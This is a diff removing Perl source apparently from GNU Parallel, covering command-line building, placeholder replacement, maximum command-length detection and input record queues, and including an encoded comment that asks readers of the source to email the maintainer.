-    #   $CommandLine::already_spread
-    #   $Global::max_jobs_running
-    # Returns: N/A
-    my $self = shift;
-    my $next_arg;
-    my $max_len = $Global::minimal_command_line_length || Limits::Command::max_length();
-
-    if($opt::cat or $opt::fifo) {
-	# Generate a tempfile name that will be used as {}
-	my($outfh,$name) = ::tmpfile(SUFFIX => ".pip");
-	close $outfh;
-	# Unlink is needed if: ssh otheruser@localhost
-	unlink $name;
-	$Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->unget([Arg->new($name)]);
-    }
-
-    while (not $self->{'arg_queue'}->empty()) {
-	$next_arg = $self->{'arg_queue'}->get();
-	if(not defined $next_arg) {
-	    next;
-	}
-	$self->push($next_arg);
-	if($self->len() >= $max_len) {
-	    # Command length is now > max_length
-	    # If there are arguments: remove the last
-	    # If there are no arguments: Error
-	    # TODO stuff about -x opt_x
-	    if($self->number_of_args() > 1) {
-		# There is something to work on
-		$self->{'arg_queue'}->unget($self->pop());
-		last;
-	    } else {
-		my $args = join(" ", map { $_->orig() } @$next_arg);
-		::error("Command line too long (",
-			$self->len(), " >= ",
-			$max_len,
-			") at number ",
-			$self->{'arg_queue'}->arg_number(),
-			": ".
-			(substr($args,0,50))."...\n");
-		$self->{'arg_queue'}->unget($self->pop());
-		::wait_and_exit(255);
-	    }
-	}
-
-	if(defined $self->{'max_number_of_args'}) {
-	    if($self->number_of_args() >= $self->{'max_number_of_args'}) {
-		last;
-	    }
-	}
-    }
-    if(($opt::m or $opt::X) and not $CommandLine::already_spread
-       and $self->{'arg_queue'}->empty() and $Global::max_jobs_running) {
-	# -m or -X and EOF => Spread the arguments over all jobslots
-	# (unless they are already spread)
-	$CommandLine::already_spread ||= 1;
-	if($self->number_of_args() > 1) {
-	    $self->{'max_number_of_args'} =
-		::ceil($self->number_of_args()/$Global::max_jobs_running);
-	    $Global::JobQueue->{'commandlinequeue'}->{'max_number_of_args'} =
-		$self->{'max_number_of_args'};
-	    $self->{'arg_queue'}->unget($self->pop_all());
-	    while($self->number_of_args() < $self->{'max_number_of_args'}) {
-		$self->push($self->{'arg_queue'}->get());
-	    }
-	}
-    }
-}
-
-sub push {
-    # Add one or more records as arguments
-    # Returns: N/A
-    my $self = shift;
-    my $record = shift;
-    push @{$self->{'arg_list'}}, $record;
-
-    my $quote_arg = $Global::noquote ? 0 : not $Global::quoting;
-    my $rep;
-    for my $arg (@$record) {
-	if(defined $arg) {
-	    for my $perlexpr (keys %{$self->{'replacecount'}}) {
-		# 50% faster than below
-		$self->{'len'}{$perlexpr} += length $arg->replace($perlexpr,$quote_arg,$self);
-		# $rep = $arg->replace($perlexpr,$quote_arg,$self);
-		# $self->{'len'}{$perlexpr} += length $rep;
-		# ::debug("length", "Length: ", length $rep,
-		# "(", $perlexpr, "=>", $rep, ")\n");
-	    }
-	}
-    }
-}
-
-sub pop {
-    # Remove last argument
-    # Returns:
-    #   the last record
-    my $self = shift;
-    my $record = pop @{$self->{'arg_list'}};
-    my $quote_arg = $Global::noquote ? 0 : not $Global::quoting;
-    for my $arg (@$record) {
-	if(defined $arg) {
-	    for my $perlexpr (keys %{$self->{'replacecount'}}) {
-		$self->{'len'}{$perlexpr} -=
-		    length $arg->replace($perlexpr,$quote_arg,$self);
-	    }
-	}
-    }
-    return $record;
-}
-
-sub pop_all {
-    # Remove all arguments and zeros the length of replacement strings
-    # Returns:
-    #   all records
-    my $self = shift;
-    my @popped = @{$self->{'arg_list'}};
-    for my $replacement_string (keys %{$self->{'replacecount'}}) {
-	$self->{'len'}{$replacement_string} = 0;
-    }
-    $self->{'arg_list'} = [];
-    return @popped;
-}
-
-sub number_of_args {
-    # The number of records
-    # Returns:
-    #   number of records
-    my $self = shift;
-    # Ftq rudef oaawuq ime dqxqmeqp az 2011-01-24 mzp ime iaz nk MQhmd
-    # Mdzrvadp Nvmdymeaz az 2011-04-10. Ftue oaawuq dqxqmeqp az
-    # 2013-08-18 ue m nuf tmdpqd me kag tmhq fa geq daf14. Bxqmeq
-    # qymux oaawuq@fmzsq.pw itqz kag dqmp ftue.
-    #
-    # U my ftq ymuzfmuzqd ar m buqoq ar rdqq earfimdq omxxqp SZG
-    # Bmdmxxqx. Rdqq earfimdq sgmdmzfqqe kag mooqee fa ftq eagdoq
-    # oapq, ngf U tmhq nqqz iazpqduzs tai ymzk mofgmxxk _dqmp_ ftq
-    # eagdoq oapq.
-    #
-    # Fa fqef ftue U bgf uz m oayyqzf fqxxuzs bqabxq fa qymux yq itqz
-    # ftqk dqmp ftue. Ftq oayyqzf ime bgf uz m eqofuaz ar ftq oapq
-    # ftmf za azq iagxp xaaw fa ruj ad uybdahq ftq earfimdq - ea ftq
-    # eagdoq oapq qcguhmxqzf fa m pgefk oadzqd. Fa ymwq egdq ftq
-    # oayyqzf iagxp zaf etai gb ur eayq azq vgef sdqbbqp ftdagst ftq
-    # eagdoq oapq U daf13'qp ftq eagdoq oapq
-    # tffb://qz.iuwubqpum.ads/iuwu/DAF13
-    #
-    # 2.5 yazfte xmfqd U dqoquhqp mz qymux rday eayqazq ita zaf azxk
-    # ymzmsqp fa ruzp ftq oayyqzf, ngf mxea ymzmsqp fa sgqee ftq oapq
-    # tmp fa nq daf13'qp.
-    #
-    # Ftue nduzse yq fa ftq oazoxgeuaz ftmf ftqdq _mdq_ bqabxq, ita
-    # mdq zaf mrruxumfqp iuft ftq bdavqof, ftmf iuxx dqmp ftq eagdoq
-    # oapq - ftagst uf ymk zaf tmbbqz hqdk arfqz.
-    #
-    # This is really the number of records
-    return $#{$self->{'arg_list'}}+1;
-}
-
-sub number_of_recargs {
-    # The number of args in records
-    # Returns:
-    #   number of args records
-    my $self = shift;
-    my $sum = 0;
-    my $nrec = scalar @{$self->{'arg_list'}};
-    if($nrec) {
-	$sum = $nrec * (scalar @{$self->{'arg_list'}[0]});
-    }
-    return $sum;
-}
-
-sub args_as_string {
-    # Returns:
-    #  all unmodified arguments joined with ' ' (similar to {})
-    my $self = shift;
-    return (join " ", map { $_->orig() }
-	    map { @$_ } @{$self->{'arg_list'}});
-}
-
-sub args_as_dirname {
-    # Returns:
-    #  all unmodified arguments joined with '/' (similar to {})
-    #  \t \0 \\ and / are quoted as: \t \0 \\ \_
-    # If $Global::max_file_length: Keep subdirs < $Global::max_file_length
-    my $self = shift;
-    my @res = ();
-
-    for my $rec_ref (@{$self->{'arg_list'}}) {
-	# If headers are used, sort by them.
-	# Otherwise keep the order from the command line.
-	my @header_indexes_sorted = header_indexes_sorted($#$rec_ref+1);
-	for my $n (@header_indexes_sorted) {
-	    CORE::push(@res,
-		 $Global::input_source_header{$n},
-		 map { my $s = $_;
-		       #  \t \0 \\ and / are quoted as: \t \0 \\ \_
-		       $s =~ s/\\/\\\\/g;
-		       $s =~ s/\t/\\t/g;
-		       $s =~ s/\0/\\0/g;
-		       $s =~ s:/:\\_:g;
-		       if($Global::max_file_length) {
-			   # Keep each subdir shorter than the longest
-			   # allowed file name
-			   $s = substr($s,0,$Global::max_file_length);
-		       }
-		       $s; }
-		 $rec_ref->[$n-1]->orig());
-	}
-    }
-    return join "/", @res;
-}
-
-sub header_indexes_sorted {
-    # Sort headers first by number then by name.
-    # E.g.: 1a 1b 11a 11b
-    # Returns:
-    #  Indexes of %Global::input_source_header sorted
-    my $max_col = shift;
-
-    no warnings 'numeric';
-    for my $col (1 .. $max_col) {
-	# Make sure the header is defined. If it is not: use column number
-	if(not defined $Global::input_source_header{$col}) {
-	    $Global::input_source_header{$col} = $col;
-	}
-    }
-    my @header_indexes_sorted = sort {
-	# Sort headers numerically then asciibetically
-	$Global::input_source_header{$a} <=> $Global::input_source_header{$b}
-	or
-	    $Global::input_source_header{$a} cmp $Global::input_source_header{$b}
-    } 1 .. $max_col;
-    return @header_indexes_sorted;
-}
-
-sub len {
-    # Uses:
-    #   $opt::shellquote
-    # The length of the command line with args substituted
-    my $self = shift;
-    my $len = 0;
-    # Add length of the original command with no args
-    # Length of command w/ all replacement args removed
-    $len += $self->{'len'}{'noncontext'} + @{$self->{'command'}} -1;
-    ::debug("length", "noncontext + command: $len\n");
-    my $recargs = $self->number_of_recargs();
-    if($self->{'context_replace'}) {
-	# Context is duplicated for each arg
-	$len += $recargs * $self->{'len'}{'context'};
-	for my $replstring (keys %{$self->{'replacecount'}}) {
-	    # If the replacements string is more than once: mulitply its length
-	    $len += $self->{'len'}{$replstring} *
-		$self->{'replacecount'}{$replstring};
-	    ::debug("length", $replstring, " ", $self->{'len'}{$replstring}, "*",
-		    $self->{'replacecount'}{$replstring}, "\n");
-	}
-	# echo 11 22 33 44 55 66 77 88 99 1010
-	# echo 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10
-	# 5 +  ctxgrp*arg
-	::debug("length", "Ctxgrp: ", $self->{'len'}{'contextgroups'},
-		" Groups: ", $self->{'len'}{'noncontextgroups'}, "\n");
-	# Add space between context groups
-	$len += ($recargs-1) * ($self->{'len'}{'contextgroups'});
-    } else {
-	# Each replacement string may occur several times
-	# Add the length for each time
-	$len += 1*$self->{'len'}{'context'};
-	::debug("length", "context+noncontext + command: $len\n");
-	for my $replstring (keys %{$self->{'replacecount'}}) {
-	    # (space between regargs + length of replacement)
-	    # * number this replacement is used
-	    $len += ($recargs -1 + $self->{'len'}{$replstring}) *
-		$self->{'replacecount'}{$replstring};
-	}
-    }
-    if($opt::nice) {
-	# Pessimistic length if --nice is set
-	# Worse than worst case: every char needs to be quoted with \
-	$len *= 2;
-    }
-    if($Global::quoting) {
-	# Pessimistic length if -q is set
-	# Worse than worst case: every char needs to be quoted with \
-	$len *= 2;
-    }
-    if($opt::shellquote) {
-	# Pessimistic length if --shellquote is set
-	# Worse than worst case: every char needs to be quoted with \ twice
-	$len *= 4;
-    }
-    # If we are using --env, add the prefix for that, too.
-    $len += $Global::envvarlen;
-
-    return $len;
-}
-
-sub replaced {
-    # Uses:
-    #   $Global::noquote
-    #   $Global::quoting
-    # Returns:
-    #   $replaced = command with place holders replaced and prepended
-    my $self = shift;
-    if(not defined $self->{'replaced'}) {
-	# Don't quote arguments if the input is the full command line
-	my $quote_arg = $Global::noquote ? 0 : not $Global::quoting;
-	$self->{'replaced'} = $self->replace_placeholders($self->{'command'},$Global::quoting,$quote_arg);
-	my $len = length $self->{'replaced'};
-	if ($len != $self->len()) {
-	    ::debug("length", $len, " != ", $self->len(), " ", $self->{'replaced'}, "\n");
-	} else {
-	    ::debug("length", $len, " == ", $self->len(), " ", $self->{'replaced'}, "\n");
-	}
-    }
-    return $self->{'replaced'};
-}
-
-sub replace_placeholders {
-    # Replace foo{}bar with fooargbar
-    # Input:
-    #   $targetref = command as shell words
-    #   $quote = should everything be quoted?
-    #   $quote_arg = should replaced arguments be quoted?
-    # Returns:
-    #   @target with placeholders replaced
-    my $self = shift;
-    my $targetref = shift;
-    my $quote = shift;
-    my $quote_arg = shift;
-    my $context_replace = $self->{'context_replace'};
-    my @target = @$targetref;
-    ::debug("replace", "Replace @target\n");
-    # -X = context replace
-    # maybe multiple input sources
-    # maybe --xapply
-    if(not @target) {
-	# @target is empty: Return empty array
-	return @target;
-    }
-    # Fish out the words that have replacement strings in them
-    my %word;
-    for (@target) {
-	my $tt = $_;
-	::debug("replace", "Target: $tt");
-	# a{1}b{}c{}d
-	# a{=1 $_=$_ =}b{= $_=$_ =}c{= $_=$_ =}d
-	# a\257<1 $_=$_ \257>b\257< $_=$_ \257>c\257< $_=$_ \257>d
-	#    A B C => aAbA B CcA B Cd
-	# -X A B C => aAbAcAd aAbBcBd aAbCcCd
-
-	if($context_replace) {
-	    while($tt =~ s/([^\s\257]*  # before {=
-                     (?:
-                      \257<       # {=
-                      [^\257]*?   # The perl expression
-                      \257>       # =}
-                      [^\s\257]*  # after =}
-                     )+)/ /x) {
-		# $1 = pre \257 perlexpr \257 post
-		$word{"$1"} ||= 1;
-	    }
-	} else {
-	    while($tt =~ s/( (?: \257<([^\257]*?)\257>) )//x) {
-		# $f = \257 perlexpr \257
-		$word{$1} ||= 1;
-	    }
-	}
-    }
-    my @word = keys %word;
-
-    my %replace;
-    my @arg;
-    for my $record (@{$self->{'arg_list'}}) {
-	# $self->{'arg_list'} = [ [Arg11, Arg12], [Arg21, Arg22], [Arg31, Arg32] ]
-	# Merge arg-objects from records into @arg for easy access
-	CORE::push @arg, @$record;
-    }
-    # Add one arg if empty to allow {#} and {%} to be computed only once
-    if(not @arg) { @arg = (Arg->new("")); }
-    # Number of arguments - used for positional arguments
-    my $n = $#_+1;
-
-    # This is actually a CommandLine-object,
-    # but it looks nice to be able to say {= $job->slot() =}
-    my $job = $self;
-    for my $word (@word) {
-	# word = AB \257< perlexpr \257> CD \257< perlexpr \257> EF
-	my $w = $word;
-	::debug("replace", "Replacing in $w\n");
-
-	# Replace positional arguments
-	$w =~ s< ([^\s\257]*)  # before {=
-                 \257<         # {=
-                 (-?\d+)       # Position (eg. -2 or 3)
-                 ([^\257]*?)   # The perl expression
-                 \257>         # =}
-                 ([^\s\257]*)  # after =}
-               >
-	   { $1. # Context (pre)
-		 (
-		 $arg[$2 > 0 ? $2-1 : $n+$2] ? # If defined: replace
-		 $arg[$2 > 0 ? $2-1 : $n+$2]->replace($3,$quote_arg,$self)
-		 : "")
-		 .$4 }egx;# Context (post)
-	::debug("replace", "Positional replaced $word with: $w\n");
-
-	if($w !~ /\257/) {
-	    # No more replacement strings in $w: No need to do more
-	    if($quote) {
-		CORE::push(@{$replace{::shell_quote($word)}}, $w);
-	    } else {
-		CORE::push(@{$replace{$word}}, $w);
-	    }
-	    next;
-	}
-	# for each arg:
-	#   compute replacement for each string
-	#   replace replacement strings with replacement in the word value
-	#   push to replace word value
-	::debug("replace", "Positional done: $w\n");
-	for my $arg (@arg) {
-	    my $val = $w;
-	    my $number_of_replacements = 0;
-	    for my $perlexpr (keys %{$self->{'replacecount'}}) {
-		# Replace {= perl expr =} with value for each arg
-		$number_of_replacements +=
-		    $val =~ s{\257<\Q$perlexpr\E\257>}
-		{$arg ? $arg->replace($perlexpr,$quote_arg,$self) : ""}eg;
-	    }
-	    my $ww = $word;
-	    if($quote) {
-		$ww = ::shell_quote_scalar($word);
-		$val = ::shell_quote_scalar($val);
-	    }
-	    if($number_of_replacements) {
-		CORE::push(@{$replace{$ww}}, $val);
-	    }
-	}
-    }
-
-    if($quote) {
-	@target = ::shell_quote(@target);
-    }
-    # ::debug("replace", "%replace=",::my_dump(%replace),"\n");
-    if(%replace) {
-	# Substitute the replace strings with the replacement values
-	# Must be sorted by length if a short word is a substring of a long word
-	my $regexp = join('|', map { my $s = $_; $s =~ s/(\W)/\\$1/g; $s }
-			  sort { length $b <=> length $a } keys %replace);
-	for(@target) {
-	    s/($regexp)/join(" ",@{$replace{$1}})/ge;
-	}
-    }
-    ::debug("replace", "Return @target\n");
-    return wantarray ? @target : "@target";
-}
-
-
-package CommandLineQueue;
-
-sub new {
-    my $class = shift;
-    my $commandref = shift;
-    my $read_from = shift;
-    my $context_replace = shift;
-    my $max_number_of_args = shift;
-    my $return_files = shift;
-    my @unget = ();
-    my ($count,%replacecount,$posrpl,$perlexpr,%len);
-    my @command = @$commandref;
-    # If the first command start with '-' it is probably an option
-    if($command[0] =~ /^\s*(-\S+)/) {
-	# Is this really a command in $PATH starting with '-'?
-	my $cmd = $1;
-	if(not ::which($cmd)) {
-	    ::error("Command ($cmd) starts with '-'. Is this a wrong option?\n");
-	    ::wait_and_exit(255);
-	}
-    }
-    # Replace replacement strings with {= perl expr =}
-    # Protect matching inside {= perl expr =}
-    # by replacing {= and =} with \257< and \257>
-    for(@command) {
-	if(/\257/) {
-	    ::error("Command cannot contain the character \257. Use a function for that.\n");
-	    ::wait_and_exit(255);
-	}
-	s/\Q$Global::parensleft\E(.*?)\Q$Global::parensright\E/\257<$1\257>/gx;
-    }
-    for my $rpl (keys %Global::rpl) {
-	# Replace the short hand string with the {= perl expr =} in $command and $opt::tagstring
-	# Avoid replacing inside existing {= perl expr =}
-	for(@command,@Global::ret_files) {
-	    while(s/((^|\257>)[^\257]*?) # Don't replace after \257 unless \257>
-                  \Q$rpl\E/$1\257<$Global::rpl{$rpl}\257>/xg) {
-	    }
-	}
-	if(defined $opt::tagstring) {
-	    for($opt::tagstring) {
-		while(s/((^|\257>)[^\257]*?) # Don't replace after \257 unless \257>
-                      \Q$rpl\E/$1\257<$Global::rpl{$rpl}\257>/x) {}
-	    }
-	}
-	# Do the same for the positional replacement strings
-	# A bit harder as we have to put in the position number
-	$posrpl = $rpl;
-	if($posrpl =~ s/^\{//) {
-	    # Only do this if the shorthand start with {
-	    for(@command,@Global::ret_files) {
-		s/\{(-?\d+)\Q$posrpl\E/\257<$1 $Global::rpl{$rpl}\257>/g;
-	    }
-	    if(defined $opt::tagstring) {
-		$opt::tagstring =~ s/\{(-?\d+)\Q$posrpl\E/\257<$1 $perlexpr\257>/g;
-	    }
-	}
-    }
-    my $sum = 0;
-    while($sum == 0) {
-	# Count how many times each replacement string is used
-	my @cmd = @command;
-	my $contextlen = 0;
-	my $noncontextlen = 0;
-	my $contextgroups = 0;
-	for my $c (@cmd) {
-	    while($c =~ s/ \257<([^\257]*?)\257> /\000/x) {
-		# %replacecount = { "perlexpr" => number of times seen }
-		# e.g { "$_++" => 2 }
-		$replacecount{$1} ++;
-		$sum++;
-	    }
-	    # Measure the length of the context around the {= perl expr =}
-	    # Use that {=...=} has been replaced with \000 above
-	    # So there is no need to deal with \257<
-	    while($c =~ s/ (\S*\000\S*) //x) {
-		my $w = $1;
-		$w =~ tr/\000//d; # Remove all \000's
-		$contextlen += length($w);
-		$contextgroups++;
-	    }
-	    # All {= perl expr =} have been removed: The rest is non-context
-	    $noncontextlen += length $c;
-	}
-	if($opt::tagstring) {
-	    my $t = $opt::tagstring;
-	    while($t =~ s/ \257<([^\257]*)\257> //x) {
-		# %replacecount = { "perlexpr" => number of times seen }
-		# e.g { "$_++" => 2 }
-		# But for tagstring we just need to mark it as seen
-		$replacecount{$1}||=1;
-	    }
-	}
-
-	$len{'context'} = 0+$contextlen;
-	$len{'noncontext'} = $noncontextlen;
-	$len{'contextgroups'} = $contextgroups;
-	$len{'noncontextgroups'} = @cmd-$contextgroups;
-	::debug("length", "@command Context: ", $len{'context'},
-		" Non: ", $len{'noncontext'}, " Ctxgrp: ", $len{'contextgroups'},
-		" NonCtxGrp: ", $len{'noncontextgroups'}, "\n");
-	if($sum == 0) {
-	    # Default command = {}
-	    # If not replacement string: append {}
-	    if(not @command) {
-		@command = ("\257<\257>");
-		$Global::noquote = 1;
-	    } elsif(($opt::pipe or $opt::pipepart)
-		    and not $opt::fifo and not $opt::cat) {
-		# With --pipe / --pipe-part you can have no replacement
-		last;
-	    } else {
-		# Append {} to the command if there are no {...}'s and no {=...=}
-		push @command, ("\257<\257>");
-	    }
-	}
-    }
-
-    return bless {
-	'unget' => \@unget,
-	'command' => \@command,
-	'replacecount' => \%replacecount,
-	'arg_queue' => RecordQueue->new($read_from,$opt::colsep),
-	'context_replace' => $context_replace,
-	'len' => \%len,
-	'max_number_of_args' => $max_number_of_args,
-	'size' => undef,
-	'return_files' => $return_files,
-	'seq' => 1,
-    }, ref($class) || $class;
-}
-
-sub get {
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	my $cmd_line = shift @{$self->{'unget'}};
-	return ($cmd_line);
-    } else {
-	my $cmd_line;
-	$cmd_line = CommandLine->new($self->seq(),
-				     $self->{'command'},
-				     $self->{'arg_queue'},
-				     $self->{'context_replace'},
-				     $self->{'max_number_of_args'},
-				     $self->{'return_files'},
-				     $self->{'replacecount'},
-				     $self->{'len'},
-	    );
-	$cmd_line->populate();
-	::debug("init","cmd_line->number_of_args ",
-		$cmd_line->number_of_args(), "\n");
-	if($opt::pipe or $opt::pipepart) {
-	    if($cmd_line->replaced() eq "") {
-		# Empty command - pipe requires a command
-		::error("--pipe must have a command to pipe into (e.g. 'cat').\n");
-		::wait_and_exit(255);
-	    }
-	} else {
-	    if($cmd_line->number_of_args() == 0) {
-		# We did not get more args - maybe at EOF string?
-		return undef;
-	    } elsif($cmd_line->replaced() eq "") {
-		# Empty command - get the next instead
-		return $self->get();
-	    }
-	}
-	$self->set_seq($self->seq()+1);
-	return $cmd_line;
-    }
-}
-
-sub unget {
-    my $self = shift;
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @{$self->{'unget'}}) && $self->{'arg_queue'}->empty();
-    ::debug("run", "CommandLineQueue->empty $empty");
-    return $empty;
-}
-
-sub seq {
-    my $self = shift;
-    return $self->{'seq'};
-}
-
-sub set_seq {
-    my $self = shift;
-    $self->{'seq'} = shift;
-}
-
-sub quote_args {
-    my $self = shift;
-    # If there is not command emulate |bash
-    return $self->{'command'};
-}
-
-sub size {
-    my $self = shift;
-    if(not $self->{'size'}) {
-	my @all_lines = ();
-	while(not $self->{'arg_queue'}->empty()) {
-	    push @all_lines, CommandLine->new($self->{'command'},
-					      $self->{'arg_queue'},
-					      $self->{'context_replace'},
-					      $self->{'max_number_of_args'});
-	}
-	$self->{'size'} = @all_lines;
-	$self->unget(@all_lines);
-    }
-    return $self->{'size'};
-}
-
-
-package Limits::Command;
-
-# Maximal command line length (for -m and -X)
-sub max_length {
-    # Find the max_length of a command line and cache it
-    # Returns:
-    #   number of chars on the longest command line allowed
-    if(not $Limits::Command::line_max_len) {
-	# Disk cache of max command line length
-	my $len_cache = $ENV{'HOME'} . "/.parallel/tmp/linelen-" . ::hostname();
-	my $cached_limit;
-	if(-e $len_cache) {
-	    open(my $fh, "<", $len_cache) || ::die_bug("Cannot read $len_cache");
-	    $cached_limit = <$fh>;
-	    close $fh;
-	} else {
-	    $cached_limit = real_max_length();
-	    # If $HOME is write protected: Do not fail
-	    mkdir($ENV{'HOME'} . "/.parallel");
-	    mkdir($ENV{'HOME'} . "/.parallel/tmp");
-	    open(my $fh, ">", $len_cache);
-	    print $fh $cached_limit;
-	    close $fh;
-	}
-	$Limits::Command::line_max_len = $cached_limit;
-	if($opt::max_chars) {
-	    if($opt::max_chars <= $cached_limit) {
-		$Limits::Command::line_max_len = $opt::max_chars;
-	    } else {
-		::warning("Value for -s option ",
-			  "should be < $cached_limit.\n");
-	    }
-	}
-    }
-    return $Limits::Command::line_max_len;
-}
-
-sub real_max_length {
-    # Find the max_length of a command line
-    # Returns:
-    #   The maximal command line length
-    # Use an upper bound of 8 MB if the shell allows for for infinite long lengths
-    my $upper = 8_000_000;
-    my $len = 8;
-    do {
-	if($len > $upper) { return $len };
-	$len *= 16;
-    } while (is_acceptable_command_line_length($len));
-    # Then search for the actual max length between 0 and upper bound
-    return binary_find_max_length(int($len/16),$len);
-}
-
-sub binary_find_max_length {
-    # Given a lower and upper bound find the max_length of a command line
-    # Returns:
-    #   number of chars on the longest command line allowed
-    my ($lower, $upper) = (@_);
-    if($lower == $upper or $lower == $upper-1) { return $lower; }
-    my $middle = int (($upper-$lower)/2 + $lower);
-    ::debug("init", "Maxlen: $lower,$upper,$middle : ");
-    if (is_acceptable_command_line_length($middle)) {
-	return binary_find_max_length($middle,$upper);
-    } else {
-	return binary_find_max_length($lower,$middle);
-    }
-}
-
-sub is_acceptable_command_line_length {
-    # Test if a command line of this length can run
-    # Returns:
-    #   0 if the command line length is too long
-    #   1 otherwise
-    my $len = shift;
-
-    local *STDERR;
-    open (STDERR, ">", "/dev/null");
-    system "true "."x"x$len;
-    close STDERR;
-    ::debug("init", "$len=$? ");
-    return not $?;
-}
-
-
-package RecordQueue;
-
-sub new {
-    my $class = shift;
-    my $fhs = shift;
-    my $colsep = shift;
-    my @unget = ();
-    my $arg_sub_queue;
-    if($colsep) {
-	# Open one file with colsep
-	$arg_sub_queue = RecordColQueue->new($fhs);
-    } else {
-	# Open one or more files if multiple -a
-	$arg_sub_queue = MultifileQueue->new($fhs);
-    }
-    return bless {
-	'unget' => \@unget,
-	'arg_number' => 0,
-	'arg_sub_queue' => $arg_sub_queue,
-    }, ref($class) || $class;
-}
-
-sub get {
-    # Returns:
-    #   reference to array of Arg-objects
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	$self->{'arg_number'}++;
-	return shift @{$self->{'unget'}};
-    }
-    my $ret = $self->{'arg_sub_queue'}->get();
-    if(defined $Global::max_number_of_args
-       and $Global::max_number_of_args == 0) {
-	::debug("run", "Read 1 but return 0 args\n");
-	return [Arg->new("")];
-    } else {
-	return $ret;
-    }
-}
-
-sub unget {
-    my $self = shift;
-    ::debug("run", "RecordQueue-unget '@_'\n");
-    $self->{'arg_number'} -= @_;
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = not @{$self->{'unget'}};
-    $empty &&= $self->{'arg_sub_queue'}->empty();
-    ::debug("run", "RecordQueue->empty $empty");
-    return $empty;
-}
-
-sub arg_number {
-    my $self = shift;
-    return $self->{'arg_number'};
-}
-
-
-package RecordColQueue;
-
-sub new {
-    my $class = shift;
-    my $fhs = shift;
-    my @unget = ();
-    my $arg_sub_queue = MultifileQueue->new($fhs);
-    return bless {
-	'unget' => \@unget,
-	'arg_sub_queue' => $arg_sub_queue,
-    }, ref($class) || $class;
-}
-
-sub get {
-    # Returns:
-    #   reference to array of Arg-objects
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	return shift @{$self->{'unget'}};
-    }
-    my $unget_ref=$self->{'unget'};
-    if($self->{'arg_sub_queue'}->empty()) {
-	return undef;
-    }
-    my $in_record = $self->{'arg_sub_queue'}->get();
-    if(defined $in_record) {
-	my @out_record = ();
-	for my $arg (@$in_record) {
-	    ::debug("run", "RecordColQueue::arg $arg\n");
-	    my $line = $arg->orig();
-	    ::debug("run", "line='$line'\n");
-	    if($line ne "") {
-		for my $s (split /$opt::colsep/o, $line, -1) {
-		    push @out_record, Arg->new($s);
-		}
-	    } else {
-		push @out_record, Arg->new("");
-	    }
-	}
-	return \@out_record;
-    } else {
-	return undef;
-    }
-}
-
-sub unget {
-    my $self = shift;
-    ::debug("run", "RecordColQueue-unget '@_'\n");
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @{$self->{'unget'}} and $self->{'arg_sub_queue'}->empty());
-    ::debug("run", "RecordColQueue->empty $empty");
-    return $empty;
-}
-
-
-package MultifileQueue;
-
-@Global::unget_argv=();
-
-sub new {
-    my $class = shift;
-    my $fhs = shift;
-    for my $fh (@$fhs) {
-	if(-t $fh) {
-	    ::warning("Input is read from the terminal. ".
-		      "Only experts do this on purpose. ".
-		      "Press CTRL-D to exit.\n");
-	}
-    }
-    return bless {
-	'unget' => \@Global::unget_argv,
-	'fhs' => $fhs,
-	'arg_matrix' => undef,
-    }, ref($class) || $class;
-}
-
-sub get {
-    my $self = shift;
-    if($opt::xapply) {
-	return $self->xapply_get();
-    } else {
-	return $self->nest_get();
-    }
-}
-
-sub unget {
-    my $self = shift;
-    ::debug("run", "MultifileQueue-unget '@_'\n");
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @Global::unget_argv
-		 and not @{$self->{'unget'}});
-    for my $fh (@{$self->{'fhs'}}) {
-	$empty &&= eof($fh);
-    }
-    ::debug("run", "MultifileQueue->empty $empty ");
-    return $empty;
-}
-
-sub xapply_get {
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	return shift @{$self->{'unget'}};
-    }
-    my @record = ();
-    my $prepend = undef;
-    my $empty = 1;
-    for my $fh (@{$self->{'fhs'}}) {
-	my $arg = read_arg_from_fh($fh);
-	if(defined $arg) {
-	    # Record $arg for recycling at end of file
-	    push @{$self->{'arg_matrix'}{$fh}}, $arg;
-	    push @record, $arg;
-	    $empty = 0;
-	} else {
-	    ::debug("run", "EOA ");
-	    # End of file: Recycle arguments
-	    push @{$self->{'arg_matrix'}{$fh}}, shift @{$self->{'arg_matrix'}{$fh}};
-	    # return last @{$args->{'args'}{$fh}};
-	    push @record, @{$self->{'arg_matrix'}{$fh}}[-1];
-	}
-    }
-    if($empty) {
-	return undef;
-    } else {
-	return \@record;
-    }
-}
-
-sub nest_get {
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	return shift @{$self->{'unget'}};
-    }
-    my @record = ();
-    my $prepend = undef;
-    my $empty = 1;
-    my $no_of_inputsources = $#{$self->{'fhs'}} + 1;
-    if(not $self->{'arg_matrix'}) {
-	# Initialize @arg_matrix with one arg from each file
-	# read one line from each file
-	my @first_arg_set;
-	my $all_empty = 1;
-	for (my $fhno = 0; $fhno < $no_of_inputsources ; $fhno++) {
-	    my $arg = read_arg_from_fh($self->{'fhs'}[$fhno]);
-	    if(defined $arg) {
-		$all_empty = 0;
-	    }
-	    $self->{'arg_matrix'}[$fhno][0] = $arg || Arg->new("");
-	    push @first_arg_set, $self->{'arg_matrix'}[$fhno][0];
-	}
-	if($all_empty) {
-	    # All filehandles were at eof or eof-string
-	    return undef;
-	}
-	return [@first_arg_set];
-    }
-
-    # Treat the case with one input source special.  For multiple
-    # input sources we need to remember all previously read values to
-    # generate all combinations. But for one input source we can
-    # forget the value after first use.
-    if($no_of_inputsources == 1) {
-	my $arg = read_arg_from_fh($self->{'fhs'}[0]);
-	if(defined($arg)) {
-	    return [$arg];
-	}
-	return undef;
-    }
-    for (my $fhno = $no_of_inputsources - 1; $fhno >= 0; $fhno--) {
-	if(eof($self->{'fhs'}[$fhno])) {
-	    next;
-	} else {
-	    # read one
-	    my $arg = read_arg_from_fh($self->{'fhs'}[$fhno]);
-	    defined($arg) || next; # If we just read an EOF string: Treat this as EOF
-	    my $len = $#{$self->{'arg_matrix'}[$fhno]} + 1;
